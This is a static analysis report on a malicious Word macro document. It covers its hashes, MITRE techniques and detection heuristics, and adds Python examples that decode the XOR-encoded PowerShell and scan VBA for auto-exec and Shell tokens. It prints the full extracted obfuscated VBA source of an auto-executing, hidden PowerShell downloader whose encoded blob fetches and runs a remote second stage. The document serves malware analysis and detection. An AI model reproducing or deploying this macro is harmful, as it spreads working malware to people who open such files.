Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8a0da9badc7151b6…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 86.2 KB
Created: 2018-06-19 17:25:00
Authoring application: Microsoft Office Word
First seen: 2018-07-04
MD5: 20c0137c7c3db22ff8242797b36e5b55
SHA-1: cd81956d846b063d87e9c1bae99d8cff91d7351b
SHA-256: 8a0da9badc7151b6eea935d13c686536658fe4bb8edd1f0dfdc2153333fc963d
Risk score: 150

Malware Insights

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.001 Command and Scripting Interpreter: PowerShell (the command handed to Shell() by the macro)

The sample is a Word document carrying an obfuscated VBA project (modules CwHXkhsHNj and KcvZJVMa in macros.bas). AutoOpen does not call Shell() itself: it uses Application.Run to invoke the function AmhmfzhNjrb by name and passes it the command string assembled by mcGnivqsYDi. AmhmfzhNjrb then calls Shell(command, 15260 - 15260), i.e. Shell(command, 0), so the PowerShell window is hidden (vbHide). The command is spread over dozens of short string literals in six helper functions (zJRWMQvS, DQYKkfLBn, mdPiDBrp, zShwGT, aEUlvTV, CrlzYbbdkT), interleaved with CDate/CByte/Sin arithmetic on undeclared variables that has no effect because every procedure starts with On Error Resume Next. The leading 'P' of POwerSHell is produced separately as Chr(80) in mcGnivqsYDi, so a plain search for 'powershell' in the source finds nothing. The fragments are concatenated, not array elements: what Shell() receives is a single one-liner of the form

POwerSHell [STrInG]::jOiN( '' ,( '99-49Y61>45m54g46@103%122Z103@41Z34Z48u106g40Y37%45u34-36&51m103u53@38m41%35>40-42&124>99u4>55%61@44&37@40m103>122Y103m41%34-48m106@40-37-45Y34>36g51Z103>20@62u52>51-34g42u105%9u34m51Z105m16g34Z37u4m43-46@34Y41g51u124u99Z21@16u40m43Z43@103@122u103Z96Z47&51>51Z55@125Z104-104u48g…58'.SPlit('uZYgm%@>&-' )| FOrEAcH{[cHar] ($_ -bxOR'0x47' ) } ))| iEX

The quoted blob is a run of decimal character codes separated by the delimiter characters u Z Y g m % @ > & -. PowerShell splits on those, XORs each value with 0x47, joins the characters and pipes the text into iEX (Invoke-Expression). Decoding the fragments shown above gives

$vzjqi = new-object random;$Cpzkbo = new-object System.Net.WebClient;$RWoll = 'http://w…

that is, a WebClient-based downloader whose target URLs follow in the remaining fragments. The second stage is whatever those URLs serve at the time of execution; it cannot be identified from the document alone.
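Added worked example (not part of the report and not the sample's own code): a Python re-implementation of the PowerShell decode step, fed with the literal fragments copied verbatim from macros.bas for zJRWMQvS and the first literal of DQYKkfLBn. The function and variable names are the example's own. The remaining fragments in macros.bas have the same format and can be appended to VBA_FRAGMENTS to recover the full script, including the download URLs.

```python
import re

# Fragments copied from the extracted macros.bas: the five literals that make
# up zJRWMQvS and the first literal of DQYKkfLBn. VBA joins them into ONE
# single-quoted PowerShell string; the list is truncated here, so the blob is
# unterminated. Append the later fragments to decode the rest of the script.
VBA_FRAGMENTS = [
    "OwerSHell" + " [STrInG]" + "::jOiN(" + " '' ,( " + "'99-49Y61>45",
    "m54g46@10" + "3%122Z103@41Z" + "34" + "Z48u106g" + "40Y37%45u34-"
    + "36&" + "51m1" + "03u53@38m41%3" + "5>40-42&124>99",
    "u4>55%61@44&" + "37@40m1" + "03>1" + "22Y103m41%34-48",
    "m1" + "06@40-37-" + "45Y34>36g51Z1" + "03>20@62u52>51" + "-34g4"
    + "2u105%9u34m51" + "Z105m16g34Z" + "37u4m43-46@34Y",
    "41g" + "51u" + "124u99" + "Z21@16u40m43Z" + "43@103@122u"
    + "103Z96Z47&5" + "1>51Z55@1" + "25Z104-104u48g",
]

XOR_KEY = 0x47               # the '0x47' in  -bxOR'0x47'
DELIMITERS = "uZYgm%@>&-"    # the argument of  .SPlit('uZYgm%@>&-')


def build_shell_argument(fragments=VBA_FRAGMENTS):
    """Reproduce what Shell() receives: Chr(80) = 'P' from KPQRrbKkSZ, then the
    fragments concatenated (LBYzIinS and the other undeclared names are Empty)."""
    return chr(80) + "".join(fragments)


def extract_encoded_blob(command):
    """Return the quoted blob that .SPlit() operates on. With the truncated
    fragment list there is no closing quote, so read to the next quote or end."""
    m = re.search(r"::jOiN\(\s*''\s*,\(\s*'([^']*)", command, re.IGNORECASE)
    if not m:
        raise ValueError("jOiN/SPlit pattern not found in command")
    return m.group(1)


def decode_blob(blob, key=XOR_KEY, delimiters=DELIMITERS):
    """Mirror of: .SPlit(delimiters) | FOrEAcH { [cHar]($_ -bxOR key) } joined with ''."""
    out = []
    for token in re.split("[" + re.escape(delimiters) + "]", blob):
        if not token:
            # Only produced where the blob is cut right after a delimiter (the
            # trailing 'g' of the last embedded fragment); skip it.
            continue
        out.append(chr(int(token) ^ key))
    return "".join(out)


def decode_macro(fragments=VBA_FRAGMENTS):
    """Full pipeline: assemble the Shell() argument, pull out the blob, decode it."""
    return decode_blob(extract_encoded_blob(build_shell_argument(fragments)))


if __name__ == "__main__":
    print(build_shell_argument()[:60])
    print(decode_macro())
```

The decoder deliberately keeps the two steps the PowerShell performs (split on a character set, then XOR each decimal value) separate from the VBA assembly step, so the same decode_blob() can be pointed at the blob once it has been carved out of the p-code or a sandbox's process-creation log instead of the source.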

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Matched lines in script:
      RpGQtb = CDate(vMWbFz + Sin(80034 + 38738) * 79201 * CInt(56623))
      iNMHVAf = kucWckuzwUw + Shell(WzlkXq + oDmPls + DwQTwVKQ, 15260 - 15260)
      zaqbc = CByte(YBGYi)
    The second argument evaluates to 0 (vbHide), so the PowerShell window is never shown. The call lives in AmhmfzhNjrb, which AutoOpen reaches only indirectly through Application.Run, so a rule that requires Shell() inside the auto-exec procedure itself would miss it.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where no visible source is available.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched lines in script:
      End Function
      Sub AutoOpen()
      On Error Resume Next
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
    Caveat: for this sample the description is contradicted by OLE_VBA_MACROS and by the recovered macros.bas below. The marker is the same AutoOpen token already reported above and adds no independent evidence.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached it.
      http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    This is the DrawingML XML namespace identifier that Office writes into its own files, not a network indicator. The actual download URLs sit inside the XOR-encoded PowerShell blob and are invisible to plain URL extraction.
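The source-side heuristics above are token matches over the recovered VBA. As an added example (not the report tool's own code), the following Python reproduces those matches against a constructed excerpt of macros.bas and adds the two folding steps a reviewer needs when triaging this family of macro: joining adjacent string literals and evaluating constant Chr() calls, which is what exposes the Chr(80) = "P" trick. The rule names OLE_VBA_EXEC_TOKEN, VBA_STRING_FRAGMENTATION and VBA_CHR_CHAR_CODE are invented for the example; the p-code rule works on the compiled stream and is not reproduced here.

```python
import re

# Constructed excerpt of macros.bas: only the procedures that carry behaviour,
# with the CDate/CByte/Sin padding removed. Line numbers refer to this excerpt.
SAMPLE_VBA = '''Function zJRWMQvS()
On Error Resume Next
dFIfnsVKlUG = "OwerSHell" + " [STrInG]" + "::jOiN(" + " '' ,( " + "'99-49Y61>45"
End Function
Function mcGnivqsYDi()
On Error Resume Next
KPQRrbKkSZ = PiJpfkl + Chr(QEnwvl + 80 + KIHjbNfLY)
mcGnivqsYDi = LBYzIinS + KPQRrbKkSZ + zJRWMQvS
End Function
Function AmhmfzhNjrb(oDmPls)
On Error Resume Next
iNMHVAf = kucWckuzwUw + Shell(WzlkXq + oDmPls + DwQTwVKQ, 15260 - 15260)
End Function
Sub AutoOpen()
On Error Resume Next
Application.Run BZVbjsT + "AmhmfzhNjrb" + mPPiUDlwoE, lbckiaczUbj + mcGnivqsYDi + RTazZ
End Sub
'''

AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+'
    r'(AutoOpen|AutoExec|AutoClose|AutoExit|Document_Open|Document_Close|Workbook_Open|Auto_Open)\b',
    re.IGNORECASE)
# "Execution tokens" in the sense of the p-code rule: calls that run a command or object.
EXEC_RE = re.compile(r'\b(Shell|CreateObject|GetObject|Application\.Run|WScript\.Shell|ShellExecute)\b',
                     re.IGNORECASE)
SEAM_RE = re.compile(r'"\s*\+\s*"')                  # the join between two adjacent literals
CHR_RE = re.compile(r'\bChrW?\s*\(([^()]*)\)', re.IGNORECASE)


def fold_chr(match):
    """Evaluate Chr(a + 80 + b) as VBA does when a and b are undeclared: Empty
    behaves as 0 in arithmetic, so only the integer literals contribute."""
    total = 0
    for part in match.group(1).split('+'):
        part = part.strip()
        if part.isdigit():
            total += int(part)
        elif not re.fullmatch(r'[A-Za-z_]\w*', part):
            return match.group(0)           # a real expression: leave it untouched
    if not 0 <= total <= 0xFFFF:
        return match.group(0)
    return '"' + chr(total) + '"'


def fold_line(line):
    """Collapse constant Chr() calls and "a" + "b" seams into plain literals."""
    return SEAM_RE.sub('', CHR_RE.sub(fold_chr, line))


def scan_vba(src):
    """Return (rule, line_number, evidence) for each heuristic hit in the source."""
    findings = []
    for lineno, raw in enumerate(src.splitlines(), 1):
        line = fold_line(raw)
        m = AUTOEXEC_RE.match(line)
        if m:
            findings.append(('OLE_VBA_AUTOOPEN', lineno, m.group(1)))
        for t in EXEC_RE.finditer(line):
            rule = 'OLE_VBA_SHELL' if t.group(1).lower() == 'shell' else 'OLE_VBA_EXEC_TOKEN'
            findings.append((rule, lineno, t.group(1)))
        seams = len(SEAM_RE.findall(raw))
        if seams >= 3:
            findings.append(('VBA_STRING_FRAGMENTATION', lineno, f'{seams + 1} literals joined'))
        chars = [fold_chr(c) for c in CHR_RE.finditer(raw)]
        if chars:
            findings.append(('VBA_CHR_CHAR_CODE', lineno, ', '.join(chars)))
    return findings


def keyword_visible(src, keyword):
    """True if the keyword appears after per-line folding. 'powershell' stays
    invisible here because its 'P' is built in a different procedure."""
    folded = '\n'.join(fold_line(l) for l in src.splitlines())
    return keyword.lower() in folded.lower()


if __name__ == '__main__':
    for f in scan_vba(SAMPLE_VBA):
        print(f)
    print('powershell visible:', keyword_visible(SAMPLE_VBA, 'powershell'))
    print('owershell visible:', keyword_visible(SAMPLE_VBA, 'owershell'))
```

Folding is per line on purpose: it is cheap and catches the bulk of literal-splitting, but it cannot follow values across procedures, which is exactly why this sample assembles the first character in mcGnivqsYDi and the rest in zJRWMQvS. Recovering the complete command requires either emulating the concatenation or reading it from the sandbox process-creation event.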

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11080 bytes
SHA-256: fa2f11a03ec10990a5458811f67e8df59a5361b242f0c4fe55bd513d4e89bfc5

Preview of the extracted script (up to the first 1,000 lines):
Attribute VB_Name = "CwHXkhsHNj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KcvZJVMa"
Function zJRWMQvS()
On Error Resume Next
aWzsGB = 40140
wjmrnw = 40624
swLZid = GkMqU
tvoBr = CByte(okYZE)
HYJjE = CDate(lWNQm + Sin(51511 + 34821) * 13492 * CInt(13681))
sdkLUn = CDate(7179)
dFIfnsVKlUG = "OwerSHell" + " [STrInG]" + "::jOiN(" + " '' ,( " + "'99-49Y61>45"
rlNAv = 26422
FwoiRX = 14812
nHzXOZ = wjFEb
dZlWIT = CByte(cijdW)
miLFmq = CDate(zXuQGu + Sin(37775 + 11925) * 73698 * CInt(10440))
zsMQa = CDate(73132)
rkhYAwITYrX = "m54g46@10" + "3%122Z103@41Z" + "34" + "Z48u106g" + "40Y37%45u34-" + "36&" + "51m1" + "03u53@38m41%3" + "5>40-42&124>99"
wiKEq = 5144
kRfZFk = 31087
wUvEG = kbbww
cjtGH = CByte(nizPT)
VhTKY = CDate(OWcYSd + Sin(17972 + 99121) * 42867 * CInt(99882))
inHiuv = CDate(61898)
OPlhOnj = "u4>55%61@44&" + "37@40m1" + "03>1" + "22Y103m41%34-48"
DmEVfo = 32399
PihjEQ = 2558
wNiCai = TVodhA
zqdjR = CByte(WwakV)
ftIZS = CDate(bkdRor + Sin(75561 + 10860) * 83163 * CInt(76337))
Riizd = CDate(33781)
fOoiliD = "m1" + "06@40-37-" + "45Y34>36g51Z1" + "03>20@62u52>51" + "-34g4" + "2u105%9u34m51" + "Z105m16g34Z" + "37u4m43-46@34Y"
zJRWMQvS = dFIfnsVKlUG + rkhYAwITYrX + OPlhOnj + fOoiliD
End Function
Function DQYKkfLBn()
On Error Resume Next
QwBnz = 46627
mqXsf = 73220
DkmzuQ = QLOds
hIZuzz = CByte(mJFLY)
FikMwU = CDate(boihCz + Sin(52851 + 76956) * 61841 * CInt(7021))
wIzDc = CDate(63293)
jPzvVj = "41g" + "51u" + "124u99" + "Z21@16u40m43Z" + "43@103@122u" + "103Z96Z47&5" + "1>51Z55@1" + "25Z104-104u48g"
SmrBU = 10559
wcLpz = 59876
hFBwDq = CiLEV
IaiIc = CByte(RZwwFn)
REwoo = CDate(ppbZz + Sin(4279 + 29870) * 86757 * CInt(20208))
siJZz = CDate(93321)
MHjQtmHZh = "48@48Z10" + "5Y35u40@36u" + "47>40Y46m44&4" + "6%35u" + "52-" + "105Y36Y" + "40m42m104g31>13"
Qjzqku = 3891
dpTUE = 52223
mdmWqS = CNiCjj
XADYai = CByte(cTvwHa)
mFAun = CDate(Mrlht + Sin(53878 + 85575) * 60414 * CInt(4236))
tGdDU = CDate(53397)
AMzDfFWMAZ = "-15" + "g3&" + "54m13u5" + "4>116" + ">104m7m4" + "7>51&" + "51-55&1" + "25>104u104u48%4" + "8Y48u105m37m4" + "0@40"
cmwtC = 61798
ncfkhN = 8556
wqBtY = lDvdZ
iWrbrZ = CByte(FRTJwh)
CuHcJq = CDate(qGkiw + Sin(64812 + 92351) * 62445 * CInt(84761))
CcHvQ = CDate(20103)
wwpnQu = "m42m55@38" + "Y36>44m1" + "05Z36g40m4" + "2Z104m10m119m3u"
mbhko = 90836
kwhjXO = 21022
CSdpW = UCzOZU
azANWk = CByte(waJidd)
lEiPEH = CDate(RHdiO + Sin(65645 + 21340) * 8141 * CInt(91181))
ZNMkn = CDate(56847)
DQbTmZuN = "55g22@2m119" + "Y104Z7" + "u47&51%51" + "-55m125%104" + ">104%48Z48@48-" + "105Z47m" + "38Z36m46Y38-"
DQYKkfLBn = jPzvVj + MHjQtmHZh + AMzDfFWMAZ + wwpnQu + DQbTmZuN
End Function
Function mdPiDBrp()
On Error Resume Next
EihoAi = 95686
zRcpf = 35520
EBaFG = aZbKkK
DPvKUS = CByte(hVAJPT)
DjwWIa = CDate(lpnJE + Sin(10352 + 31194) * 75571 * CInt(3565))
NHtkw = CDate(70975)
nEAHznSmR = "53>34&52Y40" + "-53@51u105>" + "36>" + "40-42@10"
VZcYoz = 58666
LscwfM = 99530
uXnXD = jaric
OuZFp = CByte(uJlzzX)
QQEEP = CDate(JwIaUa + Sin(28218 + 26027) * 30141 * CInt(19536))
hPjbGj = CDate(51601)
cIhcLTwSn = "4-45u3g49Z" + "38-4Z30>12-63g1" + "15u104Z" + "7&4" + "7Z51-51Z55" + "Z125Z104g104-4" + "8g48u48%105>3" + "3m53Y38g41%" + "44%52Y42&" + "46%52g52Y46>"
XAaDE = 80500
BZokK = 55817
iIKcS = NRlokQ
iwiTA = CByte(WLLmz)
nBrCa = CDate(loDVj + Sin(5506 + 24424) * 50523 * CInt(60940))
NVdYN = CDate(64780)
tNunv = "40Y41g105Z36" + "u40m42u104-49m" + "19%117%2Z3" + "3Z10" + "g104%7g47m" + "51Z51&55m125" + "u10" + "4%104%48" + "@48Z48>105" + "g36"
naQlfU = CDate(78314)
nuHDO = 70581
UJzIkK = CDate(jBGNi + Sin(62345 + 45040) * 79139 * CInt(3504))
ziiYk = zQBhN
WYuvmV = 35961
qckmm = CByte(RzPDFn)
wtQMaMol = ">38Y4" + "1-36Z40g42g46&3" + "6Y105m36%40u42u" + "104Z23Y35-46Y" + "6m53u19" + "%29-10" + "4m96m105@2"
idDFfi = CDate(35835)
iCXAPO = 92885
tBWRYu = CDate(iIWaF + Sin(21400 + 88958) * 31866 * CInt(53447))
mqIqf = jimTtw
jNZTO = 28710
FHQlOj = CByte(lFHjmB)
mSfFvU = "0&55m" + "43" + "u46>" + "51>111m" + "96&7@96%" + "110%1" + "24u99m15>40Z4"
qimbR = CDate(73661)
zKmaX = 97495
mMfrjB = CDate(ScDiT + Sin(63004 + 47918) * 39778 * CInt(73735))
fhUTr = PXAzY
YLJkz = 51682
LwjoM = CByte(qsrJvO)
Gsrrnv = "5@8-48%103Y12" + "2u103m" + "99u49m61m45Y54-" + "46Z105g41%34&6" + "3%51%"
UjCoE = CDate(7110)
QoILPX = 30448
ZihwVV = CDate(XVFwb + Sin(65326 + 77848) * 89491 * CInt(36301))
DSsQY = UjIBU
JaTMwC = 89117
bchqVw = CByte(vkRfuq)
irqiknjrVC = "111Z11" + "8%107g103Z1" + "12&112Y127g11" + "7-" + "127@"
PNRNU = CDate(93757)
szaPX = 27831
MidPlm = CDate(SQDrc + Sin(85851 + 20211) * 11956 * CInt(70943))
zZuPQ = hAVCim
lGScBh = 11252
jTIbZ = CByte(sllLb)
qMkimN = "115-110>124g99" + "g1Z5-17>" + "41@54Z103>122Y" + "103@99-3" + "4@41Z" + "49@125u51u" + "34&42g55&10" + "3m108" + ">1" + "03Z96%27%96m103"
mdPiDBrp = nEAHznSmR + cIhcLTwSn + tNunv + wtQMaMol + mSfFvU + Gsrrnv + irqiknjrVC + qMkimN
End Function
Function zShwGT()
On Error Resume Next
OQkVfq = CDate(34192)
XpZuc = 64666
KQIYfJ = CDate(kUUoHn + Sin(35024 + 73920) * 24030 * CInt(40856))
VXLQw = sJoGF
OlPIY = 35647
iipJcE = CByte(uCjwp)
iwEtzjUD = "m108" + "Z103-99%15&" + "40g45-8@48Z103&" + "108@103@96"
CfVVV = CDate(61015)
lzvmJh = 22284
GCrfu = CDate(fkNal + Sin(2938 + 65878) * 70489 * CInt(94799))
BrchD = RVhdwi
cZQiR = 10015
hIwiX = CByte(VUuau)
DzLifvCf = "m105u34g63-3" + "4u96@" + "124Y33" + "m40Y53&34m" + "38Y36>47g1" + "11m99>4" + "6Z10&3" + "3@61-4"
NkWzQ = CDate(40827)
pdCKs = 30951
ilAUX = CDate(frVXo + Sin(35075 + 79670) * 76706 * CInt(71111))
MJRPY = HwXfFr
Tjmoq = 71366
uJYMj = CByte(UUdtw)
AbtMJu = "6-47u103g4" + "6&41@103&99m" + "21-16g" + "40Y43"
dEzrLn = CDate(41850)
uoBvD = 28174
qCdwC = CDate(cXHWL + Sin(18725 + 70132) * 21322 * CInt(14042))
XjPGJs = jNqtqr
jQszF = 73089
woaIYc = CByte(KowFc)
hSwXBZSsc = "@43g110Y60-51" + "u53&" + "62&6" + "0%99@4" + "@55&61u4" + "4&37>40" + "%105Z3%40Y48Y41"
zShwGT = iwEtzjUD + DzLifvCf + AbtMJu + hSwXBZSsc
End Function
Function aEUlvTV()
On Error Resume Next
MVljzm = CDate(91548)
KVOmmj = 54901
mFVwN = CDate(BUWMK + Sin(79205 + 89482) * 61613 * CInt(51352))
qpErdE = WDZJs
FiqwC = 45344
TKSwAU = CByte(YPswPu)
WSOWz = "u43g40Z38Z35" + "%1&46Z43%34&111" + "Y99g46Z10m33u6" + "1Y46@47" + ">10" + "5Z19m40m20&51Y5" + "3@46Y41"
zwunBI = CDate(37912)
bCHTW = 89831
dUqsI = CDate(RnilU + Sin(67636 + 66650) * 40337 * CInt(34166))
icwIPb = uPpPc
TSOaF = 17725
mEEqj = CByte(sqHhDm)
ZaaSJplCn = "%32%111&1" + "10Z1" + "07Y103-" + "99-1&" + "5-17Y41g54" + ">110" + "Z124m20"
wcSwo = CDate(62750)
OwXhaC = 48177
SGIdL = CDate(kkERhM + Sin(3813 + 22707) * 22617 * CInt(22375))
mvLOtE = DHXSV
ilVJd = 55097
iDzchw = CByte(YKLBC)
JCrjEfqz = "m51-38%" + "53Y5" + "1Y" + "106@23m53g40m36" + "g3" + "4g52" + "m52>103Z99"
aEKSOz = CDate(66258)
VRzLUT = 85857
rsijQU = CDate(wztZL + Sin(70840 + 28161) * 13106 * CInt(44491))
EcXsAI = aCvMp
FUKjzH = 35380
oAAkRc = CByte(tVBZB)
CriLAiBD = "Z1-5>17%41Y54u" + "124%37Y53m" + "34m38g44>124g" + "58Y3" + "6m3" + "8m" + "51g36u47Y60g4" + "8m53g46u" + "51" + "u34m106%47>4"
INZJHH = CDate(76523)
BHqwV = 15543
BBQzE = CDate(DVhviz + Sin(6567 + 71513) * 89896 * CInt(69698))
CHvzz = HXotni
pOUvoG = 89455
pILzm = CByte(KWLCqk)
DpzlLw = "0Y52m51@1" + "03&99-24@105" + "m2-63%36-34-" + "55Z5" + "1Z46@40>41>" + "105Z10-34&52>" + "52Z38Y32g34Z12" + "4u58%" + "58'.SPlit('" + "uZYgm"
nPmAG = CDate(31875)
iEHBdG = 22775
HzopPT = CDate(nvVZv + Sin(74580 + 25804) * 42474 * CInt(41034))
mkObnl = kXRRrP
AvESZi = 98227
aWSouF = CByte(sHCVJb)
oTvrTbiSS = "%@>&-' )| FOr" + "EAcH" + "{[cHar] ($_ -bx" + "OR'0x4" + "7' "
aEUlvTV = WSOWz + ZaaSJplCn + JCrjEfqz + CriLAiBD + DpzlLw + oTvrTbiSS
End Function
Function CrlzYbbdkT()
On Error Resume Next
ClwjsZ = CDate(99898)
lwEMhv = 28149
uwruHz = CDate(WbEpW + Sin(65570 + 28015) * 99600 * CInt(94924))
PdtAw = aumiL
fpWOH = 16632
DRusOW = CByte(ETLDF)
BzBkSU = ") } " + "))| iEX"
CrlzYbbdkT = BzBkSU
End Function

Function vPKkpTZuAwr()
On Error Resume Next
sNREjq = JMYLiH
obDps = CDate(40495)
FaCtzB = CDate(rIaUzf + Sin(1747 + 20559) * 27222 * CInt(34755))
Nmmzm = 13537
Swsubj = CByte(HElVpz)
lwNVpB = 54376
dNlGz = CByte(PAqMH)
BvijNf = tmtUjW
ackZpo = 41115
pPwKAp = 36466
oUjZTa = CDate(26069)
noYQHK = CDate(CIZqv + Sin(82692 + 99838) * 89494 * CInt(95909))
oZidRi = CByte(CaJvWU)
tavsh = ftwfXf
GkEsrN = 39046
ojNsRV = 23618
DTlhQ = CDate(37536)
aFJbB = CDate(uSVOI + Sin(64266 + 77638) * 9896 * CInt(90526))
npfLIS = CByte(HVaZbZ)
bOcjS = muJZs
ZLqQjA = 67343
CPXok = 9630
cWjPY = CDate(28019)
Dowraa = CDate(KYEzuk + Sin(11599 + 17602) * 98669 * CInt(22970))
hoJTXX = CByte(wABTWi)
PhPqP = iEPBa
fLrqdV = 76381
hrAzw = 42891
jRRRk = CDate(59843)
DTWIQr = CDate(jNfmvq + Sin(9695 + 11092) * 99887 * CInt(12268))
End Function
Function mcGnivqsYDi()
On Error Resume Next
aozaRL = CByte(UzWNEF)
JYkrtU = QhjvE
DIVFW = 78265
HjBMm = 41601
LboJdz = CDate(51756)
zbkMv = CDate(jfCDt + Sin(67930 + 6246) * 30464 * CInt(30941))
KPQRrbKkSZ = PiJpfkl + Chr(QEnwvl + 80 + KIHjbNfLY)
JKWbw = CByte(MzFPj)
FztBD = FWLJN
aAOFz = 39451
pFPhl = 34203
fLTiO = CDate(36489)
RwuYdj = CDate(rlEICG + Sin(53711 + 1429) * 12239 * CInt(12282))
wNdiiE = CByte(SJTmQ)
iIIHru = jZYUm
CpLRo = 48194
mtuUT = 52386
qSHVSi = CDate(30320)
IoAbjr = CDate(SLiZZ + Sin(16385 + 14046) * 86004 * CInt(85881))
mcGnivqsYDi = LBYzIinS + KPQRrbKkSZ + zJRWMQvS + DQYKkfLBn + mdPiDBrp + zShwGT + aEUlvTV + CrlzYbbdkT
rmjZO = CByte(nVHVQt)
fPTEw = fwOrv
UKOdcv = 32007
GwNtAz = 80071
sGSAjm = CDate(52333)
OqSTPV = CDate(uPHuFG + Sin(84667 + 74929) * 78584 * CInt(89352))
End Function
Function AmhmfzhNjrb(oDmPls)
On Error Resume Next
oZATd = CByte(IGLQK)
RnLDC = SBVRj
UbWbm = 95645
zXHas = 27567
uoSHnz = CDate(41966)
jqdPrY = CDate(YIHsLh + Sin(4545 + 83205) * 44890 * CInt(25324))
wMswv = CByte(Piibfo)
lVEso = GJion
usERF = 17709
lcFRjw = 8915
wpCWr = CDate(87021)
RpGQtb = CDate(vMWbFz + Sin(80034 + 38738) * 79201 * CInt(56623))
iNMHVAf = kucWckuzwUw + Shell(WzlkXq + oDmPls + DwQTwVKQ, 15260 - 15260)
zaqbc = CByte(YBGYi)
TDMmis = jijIzS
WjMNj = 29669
cDTSU = 42918
AGKjw = CDate(74207)
IcjAj = CDate(KjBRSC + Sin(68839 + 43023) * 54874 * CInt(2163))
End Function
Sub AutoOpen()
On Error Resume Next
WzCYFi = CByte(taVij)
unCcGr = ARGLnO
olsAbt = 60502
JrRQX = 68823
TzDCjj = CDate(97244)
VXIslF = CDate(MuVGI + Sin(95158 + 20355) * 68046 * CInt(56827))
Application.Run BZVbjsT + "AmhmfzhNjrb" + mPPiUDlwoE, lbckiaczUbj + mcGnivqsYDi + RTazZ
AJOaSp = CByte(vSPjas)
vstpZ = vTmzYJ
zKGCv = 98218
YHhfz = 46592
zzYfo = CDate(34642)
EKHjE = CDate(PvvasK + Sin(48994 + 32202) * 93806 * CInt(95006))
End Sub